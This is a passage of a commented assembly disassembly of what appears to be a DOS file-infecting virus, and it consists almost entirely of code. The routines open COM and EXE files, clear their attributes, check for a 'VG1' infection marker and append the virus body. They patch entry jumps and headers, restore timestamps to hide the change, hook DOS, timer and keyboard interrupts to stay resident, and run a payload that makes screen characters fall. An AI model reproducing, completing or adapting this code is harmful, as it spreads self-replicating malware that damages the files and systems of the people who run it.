- add dx,5 - mov ah,3Bh ; ';' - call sub_1 ; (0436) - retn -sub_2 endp - -loc_29: ; xref 6FB8:0394, 03D5, 041D, 0431 - call sub_2 ; (0444) - mov dx,si - add dx,46h - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx -loc_30: ; xref 6FB8:02C8, 033C - mov bx,ds:data_48e[si] ; (6FB8:00EF=0) - or bx,bx ; Zero ? - jz loc_32 ; Jump if zero - mov cx,ds:data_51e[si] ; (6FB8:00F5=0) - mov dx,data_56[si] ; (6FB8:0151=4D10h) - mov ds,data_57[si] ; (6FB8:0153=6FB8h) - cmp cx,20h - je loc_31 ; Jump if equal - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx -loc_31: ; xref 6FB8:0477 - push cs - pop ds - mov cx,ds:data_49e[si] ; (6FB8:00F1=0) - mov dx,ds:data_50e[si] ; (6FB8:00F3=0) - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle -loc_32: ; xref 6FB8:0466 - mov dl,ds:data_41e[si] ; (6FB8:00E3=0) - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) - call sub_16 ; (089A) - pop ax - mov ds:data_39e[si],ax ; (6FB8:00E0=0) - cmp byte ptr [si+3],0FFh - je loc_33 ; Jump if equal - add ax,10h - add [si+2],ax - pop ax - pop ds -;* jmp dword ptr cs:[si] ;*1 entry - db 0FFh, 2Ch -loc_33: ; xref 6FB8:04A5 - call sub_10 ; (076E) - push cs - pop ds - mov ax,[si] - mov word ptr ds:[100h],ax ; (6FB8:0100=40E9h) - mov al,[si+2] - mov byte ptr ds:[102h],al ; (6FB8:0102=1) - jz loc_34 ; Jump if zero - mov bx,ds - add bx,1D0h - mov es,bx - mov di,si - mov dx,si - mov cx,0BFAh - call sub_20 ; (0D32) - mov cx,dx - mov si,dx - dec si - mov di,si - std ; Set direction flag - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - push ds - pop es - mov di,data_93e ; (7188:0100=0) - mov ds,bx - mov si,dx - mov cx,0BFAh - call sub_20 ; (0D32) - mov si,100h - push cs - pop ds - call sub_13 ; (07CD) - mov dx,1D0h -loc_34: ; xref 6FB8:04C2 - mov di,cs - add di,dx - mov word ptr [si+5],100h - mov [si+7],di - pop ax - pop ds - mov ds,di - mov es,di - mov ss,di - xor bx,bx ; Zero register - xor cx,cx ; Zero register - xor bp,bp ; Zero register -;* jmp dword ptr cs:[si+5] ;*1 entry - db 0FFh, 6Ch, 05h -loc_35: ; xref 6FB8:0574, 0585, 058D - mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) - retn - -; -; SUBROUTINE -; -; Called from: 6FB8:0339, 0391, 03D2 -; - -sub_3 proc near - mov bx,ds:data_48e[si] ; (6FB8:00EF=0) - or bx,bx ; Zero ? - jz loc_ret_36 ; Jump if zero - mov dx,si - add dx,data_34e ; (6FB8:0004=0) - nop ;*ASM fixup - sign extn byte - mov cx,1 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - -loc_ret_36: ; xref 6FB8:0525 - retn -sub_3 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:038C, 03CD -; - -sub_4 proc near - push dx - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - add al,41h ; 'A' - mov ah,3Ah ; ':' - mov word ptr ds:[884h][si],ax ; (6FB8:0884=8489h) - mov byte ptr ds:[886h][si],5Ch ; (6FB8:0886=0EAh) '\' - push si - add si,offset ds:[887h] ; (6FB8:0887=0) - mov ah,47h ; 'G' - mov di,si - xor dl,dl ; Zero register - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - pop si - dec di -loc_37: ; xref 6FB8:055B - inc di - mov al,[di] - or al,al ; Zero ? - jnz loc_37 ; Jump if not zero - pop bx - mov byte ptr [di],5Ch ; '\' - inc di - mov dx,bx -loc_38: ; xref 6FB8:056C - mov al,[bx] - mov [di],al - inc bx - inc di - or al,al ; Zero ? - jnz loc_38 ; Jump if not zero - -; External Entry into Subroutine -; -; Called from: 6FB8:097E - -sub_5: - mov ax,4300h - call sub_1 ; (0436) - jc loc_35 ; Jump if carry Set - mov cs:data_42e[si],cx ; (6FB8:00E4=0) - and cx,0FEh - mov ax,4301h - call sub_1 ; (0436) - jc loc_35 ; Jump if carry Set - mov ax,3D02h - call sub_1 ; (0436) - jc loc_35 ; Jump if carry Set - mov bx,ax - push ds - push dx - call sub_6 ; (05BD) - pop dx - pop ds - pushf ; Push flags - mov cx,cs:data_42e[si] ; (6FB8:00E4=0) - cmp cx,20h - je loc_39 ; Jump if equal - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx -loc_39: ; xref 6FB8:05A1 - mov cx,cs:data_43e[si] ; (6FB8:00E6=0) - mov dx,cs:data_44e[si] ; (6FB8:00E8=0) - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - popf ; Pop flags - retn -sub_4 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0593 -; - -sub_6 proc near - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - push cs - pop ds - mov ds:data_43e[si],cx ; (6FB8:00E6=0) - mov ds:data_44e[si],dx ; (6FB8:00E8=0) - mov dx,si - add dx,0Dh - mov di,dx - mov ah,3Fh ; '?' - mov cx,1Ch - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - cmp word ptr [di],5A4Dh - je loc_42 ; Jump if equal - call sub_9 ; (0764) - add ax,0CF5h - jc loc_ret_40 ; Jump if carry Set - cmp byte ptr [di],0E9h - jne loc_41 ; Jump if not equal - mov dx,[di+1] - xor cx,cx ; Zero register - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,di - add dx,1Ch - mov ah,3Fh ; '?' - mov cx,3 - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - call sub_7 ; (06AB) - jnc loc_41 ; Jump if carry=0 - mov cs:data_58[si],1 ; (6FB8:0155=0) - -loc_ret_40: ; xref 6FB8:05E6 - retn -loc_41: ; xref 6FB8:05EB, 0606 - call sub_9 ; (0764) - mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) - mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) - push ax - mov word ptr [di+3],0FFFFh - mov cx,5 - mov ah,40h ; '@' - mov dx,di - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov dx,si - add dx,5 - mov cx,0BF5h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov byte ptr [di],0E9h - pop ax - add ax,0F7h - mov [di+1],ax - mov dx,di - mov cx,3 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - clc ; Clear carry flag - retn -loc_42: ; xref 6FB8:05DE - cmp word ptr [di+0Ch],0FFFFh - jne loc_43 ; Jump if not equal - push si - mov si,[di+14h] - mov cx,[di+16h] - mov ax,cx - mov cl,ch - xor ch,ch ; Zero register - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - add si,ax - adc cx,0 - sub si,3 - sbb cx,0 - mov ax,[di+8] - call sub_8 ; (0751) - add si,ax - adc cx,dx - mov dx,si - pop si - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,di - add dx,1Ch - mov ah,3Fh ; '?' - mov cx,3 - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - call sub_7 ; (06AB) - jnc loc_46 ; Jump if carry=0 - mov cs:data_58[si],1 ; (6FB8:0155=0) - retn - -; External Entry into Subroutine -; -; Called from: 6FB8:0603, 069F - -sub_7: - cmp word ptr [di+1Ch],4756h - jne loc_45 ; Jump if not equal - cmp byte ptr [di+1Eh],31h ; '1' - jne loc_45 ; Jump if not equal -loc_43: ; xref 6FB8:0657 - stc ; Set carry flag - -loc_ret_44: ; xref 6FB8:06E0 - retn -loc_45: ; xref 6FB8:06B0, 06B6 - clc ; Clear carry flag - retn -loc_46: ; xref 6FB8:06A2 - call sub_9 ; (0764) - mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) - mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) - mov cx,[di+4] - shl cx,1 ; Shift w/zeros fill - xchg ch,cl - mov bp,cx - and bp,0FF00h - xor ch,ch ; Zero register - add bp,[di+6] - adc cx,0 - sub bp,ax - sbb cx,dx - jc loc_ret_44 ; Jump if carry Set - push ax - push dx - push word ptr [di+18h] - mov byte ptr [di+18h],0FFh - mov cx,5 - mov ah,40h ; '@' - mov dx,di - add dx,14h - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - pop word ptr [di+18h] - mov dx,si - add dx,5 - mov cx,0BF5h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - pop word ptr [di+16h] - pop word ptr [di+14h] - add word ptr [di+14h],0FAh - adc word ptr [di+16h],0 - mov ax,[di+8] - call sub_8 ; (0751) - sub [di+14h],ax - sbb [di+16h],dx - mov cl,0Ch - shl word ptr [di+16h],cl ; Shift w/zeros fill - mov ax,0BFAh - add ax,[di+2] - mov [di+2],ax - and word ptr [di+2],1FFh - mov al,ah - xor ah,ah ; Zero register - shr ax,1 ; Shift w/zeros fill - add [di+4],ax - mov dx,di - mov cx,1Ch - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - clc ; Clear carry flag - retn -sub_6 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0684, 0721 -; - -sub_8 proc near - xor dx,dx ; Zero register - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - retn -sub_8 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:05E0, 060F, 06BC -; - -sub_9 proc near - xor dx,dx ; Zero register - xor cx,cx ; Zero register - mov ax,4202h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - retn -sub_9 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0263, 04B2 -; - -sub_10 proc near - xor ax,ax ; Zero register - mov ds,ax - lds di,dword ptr ds:data_11e ; (0000:009C=10BCh) Load 32 bit ptr - lds di,dword ptr [di+1] ; Load 32 bit ptr - mov ax,di - sub di,75Fh - call sub_11 ; (07AB) - jz loc_ret_47 ; Jump if zero - mov di,ax - sub di,755h - call sub_11 ; (07AB) - jz loc_ret_47 ; Jump if zero - lds di,dword ptr ds:data_27e ; (00AE:0080=4EFFh) Load 32 bit ptr - lds di,dword ptr [di+1] ; Load 32 bit ptr - mov ax,di - sub di,676h - call sub_11 ; (07AB) - jz loc_ret_47 ; Jump if zero - mov di,ax - sub di,673h - call sub_11 ; (07AB) - -loc_ret_47: ; xref 6FB8:0782, 078D, 079F - retn -sub_10 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:077F, 078A, 079C, 07A7 -; - -sub_11 proc near - xor dx,dx ; Zero register - cmp word ptr [di],4756h - jne loc_48 ; Jump if not equal - cmp byte ptr [di+2],31h ; '1' - je loc_49 ; Jump if equal -loc_48: ; xref 6FB8:07B1 - inc dx -loc_49: ; xref 6FB8:07B7 - sub di,0F7h - or dx,dx ; Zero ? - retn -sub_11 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:07DE, 07E4, 07EA, 07F0, 0864, 086A, 0870 -; - -sub_12 proc near - mov al,0EAh - stosb ; Store al to es:[di] - mov ax,cx - add ax,si - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - -loc_ret_50: ; xref 6FB8:07CF - retn -sub_12 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:04F4 -; - -sub_13 proc near - or dx,dx ; Zero ? - jz loc_ret_50 ; Jump if zero - push ds - push es - mov es,ds:data_39e[si] ; (6FB8:00E0=0) - mov di,data_46e ; (6FB8:00EC=0) - cld ; Clear direction - mov cx,9A8h - call sub_12 ; (07C1) - mov cx,76Ah - call sub_12 ; (07C1) - mov cx,7BEh - call sub_12 ; (07C1) - mov cx,84Ch - call sub_12 ; (07C1) - xor ax,ax ; Zero register - mov ds,ax - cli ; Disable interrupts - mov ax,0ECh - xchg ax,ds:data_3e ; (0000:0070=0FF53h) - mov word ptr cs:[0A88h][si],ax ; (6FB8:0A88=49A0h) - mov ax,es - xchg ax,ds:data_4e ; (0000:0072=0F000h) - mov word ptr cs:[0A8Ah][si],ax ; (6FB8:0A8A=0B904h) - mov ax,0F1h - xchg ax,ds:data_5e ; (0000:0080=1094h) - mov word ptr cs:[76Eh][si],ax ; (6FB8:076E=0C033h) - mov ax,es - xchg ax,ds:data_6e ; (0000:0082=123h) - mov word ptr cs:[770h][si],ax ; (6FB8:0770=0D88Eh) - mov ax,0F6h - xchg ax,ds:data_7e ; (0000:0084=109Eh) - mov word ptr cs:[7DCh][si],ax ; (6FB8:07DC=9A8h) - mov ax,es - xchg ax,ds:data_8e ; (0000:0086=123h) - mov word ptr cs:[7DEh][si],ax ; (6FB8:07DE=0E0E8h) - mov ax,0FBh - xchg ax,ds:data_11e ; (0000:009C=10BCh) - mov word ptr cs:[857h][si],ax ; (6FB8:0857=6C3h) - mov ax,es - xchg ax,word ptr ds:data_11e+2 ; (0000:009E=123h) - mov word ptr cs:[859h][si],ax ; (6FB8:0859=848Eh) - pop es - pop ds - sti ; Enable interrupts - retn -sub_13 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:08F2 -; - -sub_14 proc near - push es - mov es,word ptr ds:[0E0h][si] ; (0000:00E0=10DAh) - mov di,data_21e ; (0000:00F1=10h) - cld ; Clear direction - mov cx,76Dh - call sub_12 ; (07C1) - mov cx,7E0h - call sub_12 ; (07C1) - mov cx,856h - call sub_12 ; (07C1) - pop es - retn -sub_14 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:024A, 0938 -; - -sub_15 proc near - push es - xor ax,ax ; Zero register - mov es,ax - mov ax,85Bh - add ax,si - xchg ax,es:data_9e ; (0000:0090=156h) - mov ds:data_18e[si],ax ; (0000:00EA=123h) - mov ax,cs - xchg ax,es:data_10e ; (0000:0092=44Bh) - mov ds:data_19e[si],ax ; (0000:00EC=10DAh) - pop es - mov byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) - retn -sub_15 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0499, 0981 -; - -sub_16 proc near - push es - xor ax,ax ; Zero register - mov es,ax - mov ax,cs:data_45e[si] ; (6FB8:00EA=0) - mov es:data_9e,ax ; (0000:0090=156h) - mov ax,cs:data_46e[si] ; (6FB8:00EC=0) - mov es:data_10e,ax ; (0000:0092=44Bh) - pop es - retn -sub_16 endp - - jmp short loc_53 ; (08EA) - nop -;* jmp far ptr loc_2 ;*(029B:136C) - db 0EAh, 6Ch, 13h, 9Bh, 02h - -; -; SUBROUTINE -; -; Called from: 6FB8:0247, 08CB, 08EC, 0935 -; - -sub_17 proc near - pop bx - push ds - push ax - push ds - push cs - pop ds - call sub_18 ; (08C4) - -; External Entry into Subroutine -; -; Called from: 6FB8:08C1 - -sub_18: - pop si - sub si,77Bh - jmp bx ;*Register jump -loc_51: ; xref 6FB8:0918, 091D - call sub_17 ; (08BB) - push cx - mov ax,[si+7] - mov cx,es - cmp ax,cx - pop cx - pop ds - pop ax - jnz loc_52 ; Jump if not zero - push cs - pop es - cmp ah,49h ; 'I' - je loc_52 ; Jump if equal - add bx,1D0h -loc_52: ; xref 6FB8:08D9, 08E0 - pop ds - jmp short loc_55 ; (0924) - db 90h -loc_53: ; xref 6FB8:08B3, 090A, 0913 - xor dx,dx ; Zero register -loc_54: ; xref 6FB8:090F - call sub_17 ; (08BB) - push es - push dx - cli ; Disable interrupts - call sub_14 ; (0858) - sti ; Enable interrupts - pop ax - mov dx,1D0h - add dx,ax - add dx,10h - pop es - pop ds - pop ax - pop ds - mov ah,31h ; '1' - jmp short loc_55 ; (0924) - cmp ah,4Ch ; 'L' - je loc_53 ; Jump if equal - cmp ah,31h ; '1' - je loc_54 ; Jump if equal - or ah,ah ; Zero ? - jz loc_53 ; Jump if zero - cmp ah,49h ; 'I' - je loc_51 ; Jump if equal - cmp ah,4Ah ; 'J' - je loc_51 ; Jump if equal - cmp ah,4Bh ; 'K' - je loc_56 ; Jump if equal -loc_55: ; xref 6FB8:08E7, 0905, 0993 -;* jmp far ptr loc_4 ;*(0E4C:035D) - db 0EAh, 5Dh, 03h, 4Ch, 0Eh - db 80h,0FCh, 4Bh, 75h,0F6h -loc_56: ; xref 6FB8:0922 - push cx - push dx - push es - push bx - push si - push di - push bp - call sub_17 ; (08BB) - call sub_15 ; (0875) -loc_57: ; xref 6FB8:0941, 0949 - sti ; Enable interrupts - test byte ptr ds:data_26e,2 ; (0000:0972=74h) - jnz loc_57 ; Jump if not zero - cli ; Disable interrupts - test byte ptr ds:data_26e,2 ; (0000:0972=74h) - jnz loc_57 ; Jump if not zero - or byte ptr ds:data_26e,2 ; (0000:0972=74h) - pop ds - mov bx,dx - mov byte ptr cs:data_40e[si],0FFh ; (6FB8:00E2=0) - cmp byte ptr [bx+1],3Ah ; ':' - jne loc_58 ; Jump if not equal - mov al,[bx] - or al,20h ; ' ' - sub al,61h ; 'a' - mov cs:data_40e[si],al ; (6FB8:00E2=0) -loc_58: ; xref 6FB8:095D - push si - push di - push es - cld ; Clear direction - mov si,dx - push cs - pop es - mov di,offset ds:[984h] ; (6FB8:0984=2Eh) -loc_59: ; xref 6FB8:0979 - lodsb ; String [si] to al - stosb ; Store al to es:[di] - or al,al ; Zero ? - jnz loc_59 ; Jump if not zero - pop es - pop di - pop si - call sub_5 ; (056E) - call sub_16 ; (089A) - and byte ptr cs:[972h],0FDh ; (6FB8:0972=0BFh) - pop ax - pop ds - pop bp - pop di - pop si - pop bx - pop es - pop dx - pop cx - jmp short loc_55 ; (0924) -sub_17 endp - - db 83h,0C2h, 0Fh,0B1h, 04h,0D3h - db 0EAh,0E9h, 4Dh,0FFh,0EAh,0FEh - db 5Dh, 9Bh, 02h, 56h,0E8h, 00h - db 00h, 5Eh, 81h,0EEh, 5Fh, 08h - db 2Eh, 80h, 8Ch,0EEh, 00h, 01h - db 5Eh, 32h,0C0h,0CFh, 01h, 00h - db 00h, 00h, 8Ah, 00h, 00h, 00h - db 00h, 5Fh,0FEh, 00h, 00h, 00h - db 00h,0B8h, 00h, 00h, 49h, 00h - db 00h, 00h - db 'A:\TEST3066.COM' - - - db 00h, 00h, 00h, 45h, 58h, 45h - db 00h, 45h, 00h - db 143 dup (0) -loc_60: ; xref 6FB8:0AEF - push cx - push ds - push es - push si - push di - push cs - pop es - cld ; Clear direction - test al,20h ; ' ' - jz loc_63 ; Jump if zero - test al,2 - jnz loc_64 ; Jump if not zero - xor ax,ax ; Zero register - mov ds,ax - mov al,ds:data_25e ; (0000:0449=3) - mov cx,0B800h - cmp al,7 - jne loc_61 ; Jump if not equal - mov cx,0B000h - jmp short loc_62 ; (0A9F) -loc_61: ; xref 6FB8:0A90 - cmp al,2 - je loc_62 ; Jump if equal - cmp al,3 - jne loc_64 ; Jump if not equal -loc_62: ; xref 6FB8:0A95, 0A99 - mov word ptr cs:[97Ch],cx ; (6FB8:097C=5E5Fh) - or byte ptr cs:[972h],2 ; (6FB8:0972=0BFh) - mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) - mov ds,cx - mov cx,7D0h - xor si,si ; Zero register - mov di,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - xor ax,ax ; Zero register - mov ds,ax - mov ax,0B92h - xchg ax,ds:data_1e ; (0000:0024=45h) - mov word ptr cs:[973h],ax ; (6FB8:0973=984h) - mov ax,cs - xchg ax,ds:data_2e ; (0000:0026=3D1h) - mov word ptr cs:[975h],ax ; (6FB8:0975=0AAACh) -loc_63: ; xref 6FB8:0A7E - mov cx,50h - mov ax,0F00h - mov di,offset data_54 ; (6FB8:0105=9) - rep stosw ; Rep when cx >0 Store ax to es:[di] - and byte ptr cs:[972h],7 ; (6FB8:0972=0BFh) -loc_64: ; xref 6FB8:0A82, 0A9D - pop di - pop si - pop es - pop ds - pop cx - jmp loc_76 ; (0BCF) -loc_65: ; xref 6FB8:0AFE - jmp short loc_60 ; (0A74) - push ax - mov byte ptr cs:[979h],0 ; (6FB8:0979=75h) - mov al,byte ptr cs:[972h] ; (6FB8:0972=0BFh) - test al,60h ; '`' - jnz loc_65 ; Jump if not zero - test al,80h - jz loc_68 ; Jump if zero - cmp word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) - je loc_66 ; Jump if equal - inc word ptr cs:[97Eh] ; (6FB8:097E=0EDE8h) - cmp word ptr cs:[97Eh],444h ; (6FB8:097E=0EDE8h) - jl loc_66 ; Jump if < - call sub_19 ; (0C25) - jmp loc_76 ; (0BCF) -loc_66: ; xref 6FB8:0B0A, 0B18 - test al,18h - jz loc_67 ; Jump if zero - dec word ptr cs:[977h] ; (6FB8:0977=0C00Ah) - jnz loc_67 ; Jump if not zero - and byte ptr cs:[972h],0E7h ; (6FB8:0972=0BFh) - or byte ptr cs:[972h],40h ; (6FB8:0972=0BFh) '@' - test al,8 - jz loc_67 ; Jump if zero - or byte ptr cs:[972h],20h ; (6FB8:0972=0BFh) ' ' -loc_67: ; xref 6FB8:0B22, 0B29, 0B39, 0B4C - jmp loc_76 ; (0BCF) -loc_68: ; xref 6FB8:0B02 - xor byte ptr cs:[972h],1 ; (6FB8:0972=0BFh) - test al,1 - jz loc_67 ; Jump if zero - push bx - push si - push ds - mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) - xor si,si ; Zero register - mov byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) -loc_69: ; xref 6FB8:0BB5 - mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) - or bx,bx ; Zero ? - jz loc_70 ; Jump if zero - cmp byte ptr [bx+si],20h ; ' ' - jne loc_70 ; Jump if not equal - cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' - je loc_70 ; Jump if equal - mov ax,720h - xchg ax,ds:data_31e[bx+si] ; (5E5F:FF60=0FFFFh) - mov [bx+si],ax - add bx,0A0h -loc_70: ; xref 6FB8:0B65, 0B6A, 0B71 - cmp bx,data_30e ; (5E5F:0FA0=0FFh) - je loc_71 ; Jump if equal - cmp byte ptr [bx+si],20h ; ' ' - jne loc_71 ; Jump if not equal - jnz loc_74 ; Jump if not zero -loc_71: ; xref 6FB8:0B84, 0B89 - mov bx,data_29e ; (5E5F:0F00=0FFh) -loc_72: ; xref 6FB8:0BA2 - cmp byte ptr [bx+si],20h ; ' ' - jne loc_73 ; Jump if not equal - cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' - jne loc_74 ; Jump if not equal -loc_73: ; xref 6FB8:0B93 - sub bx,0A0h - or bx,bx ; Zero ? - jnz loc_72 ; Jump if not zero -loc_74: ; xref 6FB8:0B8B, 0B9A - mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) - or word ptr cs:[96Eh],bx ; (6FB8:096E=0F28Bh) - add si,2 - cmp si,0A0h - jne loc_69 ; Jump if not equal - cmp byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) - jne loc_75 ; Jump if not equal - or byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) - mov word ptr cs:[97Eh],1 ; (6FB8:097E=0EDE8h) -loc_75: ; xref 6FB8:0BBD - pop ds - pop si - pop bx -loc_76: ; xref 6FB8:0AEC, 0B1D, 0B41 - pop ax -;* jmp far ptr loc_90 ;*(FC00:3F4D) - db 0EAh, 4Dh, 3Fh, 00h,0FCh -loc_77: ; xref 6FB8:0C32 - mov al,20h ; ' ' - out 20h,al ; port 20h, 8259-1 int command - ; al = 20h, end of interrupt - pop ax - iret ; Interrupt return - db 50h,0E4h, 60h, 2Eh,0A2h, 7Ah - db 09h,0E4h, 61h, 8Ah,0E0h, 0Ch - db 80h,0E6h, 61h, 8Ah,0C4h,0E6h - db 61h, 2Eh, 80h, 3Eh, 79h, 09h - db 00h, 2Eh,0C6h, 06h, 79h, 09h - db 01h, 75h,0D9h, 2Eh,0A0h, 7Ah - db 09h, 3Ch,0F0h, 74h,0D1h, 24h - db 7Fh, 2Eh, 3Ah, 06h, 7Bh, 09h - db 2Eh,0A2h, 7Bh, 09h, 74h,0C4h - db 2Eh, 83h, 3Eh, 7Eh, 09h, 00h - db 74h, 07h, 2Eh,0C7h, 06h, 7Eh - db 09h, 01h, 00h,0E8h, 02h, 00h - db 0EBh,0B0h - -; -; SUBROUTINE -; -; Called from: 6FB8:0B1A -; - -sub_19 proc near - mov word ptr cs:[977h],28h ; (6FB8:0977=0C00Ah) - test byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) - jz loc_77 ; Jump if zero - mov byte ptr cs:[970h],1 ; (6FB8:0970=0Eh) - push bx - push si - push ds - mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) - test byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) - jnz loc_81 ; Jump if not zero - or byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) - xor si,si ; Zero register -loc_78: ; xref 6FB8:0C77 - mov bx,data_29e ; (5E5F:0F00=0FFh) -loc_79: ; xref 6FB8:0C5E - cmp byte ptr [bx+si],20h ; ' ' - je loc_80 ; Jump if equal - sub bx,0A0h - jnc loc_79 ; Jump if carry=0 - mov bx,0F00h -loc_80: ; xref 6FB8:0C58 - add bx,data_28e ; (5E5F:00A0=0FFh) - mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) - mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) - inc si - inc si - cmp si,data_37e ; (6FB8:00A0=0) - jne loc_78 ; Jump if not equal -loc_81: ; xref 6FB8:0C48 - xor si,si ; Zero register -loc_82: ; xref 6FB8:0CE4 - cmp cs:data_54[si],0FA0h ; (6FB8:0105=0CD09h) - je loc_88 ; Jump if equal - mov bx,word ptr cs:[980h][si] ; (6FB8:0980=0E8FBh) - mov ax,[bx+si] - cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) - jne loc_84 ; Jump if not equal - push bx -loc_83: ; xref 6FB8:0CA0, 0CA4 - or bx,bx ; Zero ? - jz loc_86 ; Jump if zero - sub bx,0A0h - cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) - jne loc_83 ; Jump if not equal - cmp ax,[bx+si] - je loc_83 ; Jump if equal - pop bx -loc_84: ; xref 6FB8:0C90 - or bx,bx ; Zero ? - jnz loc_85 ; Jump if not zero - mov word ptr [si],720h - jmp short loc_87 ; (0CCB) -loc_85: ; xref 6FB8:0CA9 - mov ax,[bx+si] - mov ds:data_31e[bx+si],ax ; (5E5F:FF60=0FFFFh) - mov word ptr [bx+si],720h - sub word ptr cs:[980h][si],0A0h ; (6FB8:0980=0E8FBh) - mov byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) - jmp short loc_88 ; (0CDE) -loc_86: ; xref 6FB8:0C95 - pop bx -loc_87: ; xref 6FB8:0CAF - mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) - add bx,0A0h - mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) - mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) -loc_88: ; xref 6FB8:0C82, 0CC8 - inc si - inc si - cmp si,0A0h - jne loc_82 ; Jump if not equal - cmp byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) - je loc_89 ; Jump if equal - push es - push di - push cx - push ds - pop es - push cs - pop ds - mov si,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) - xor di,di ; Zero register - mov cx,7D0h - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - mov word ptr cs:[977h],0FFDCh ; (6FB8:0977=0C00Ah) - and byte ptr cs:[972h],4 ; (6FB8:0972=0BFh) - or byte ptr cs:[972h],88h ; (6FB8:0972=0BFh) - mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) - xor ax,ax ; Zero register - mov ds,ax - mov ax,word ptr cs:[973h] ; (6FB8:0973=984h) - mov ds:data_1e,ax ; (0000:0024=45h) - mov ax,word ptr cs:[975h] ; (6FB8:0975=0AAACh) - mov ds:data_2e,ax ; (0000:0026=3D1h) - pop cx - pop di - pop es -loc_89: ; xref 6FB8:0CEC - pop ds - pop si - pop bx - retn -sub_19 endp - - -; -; 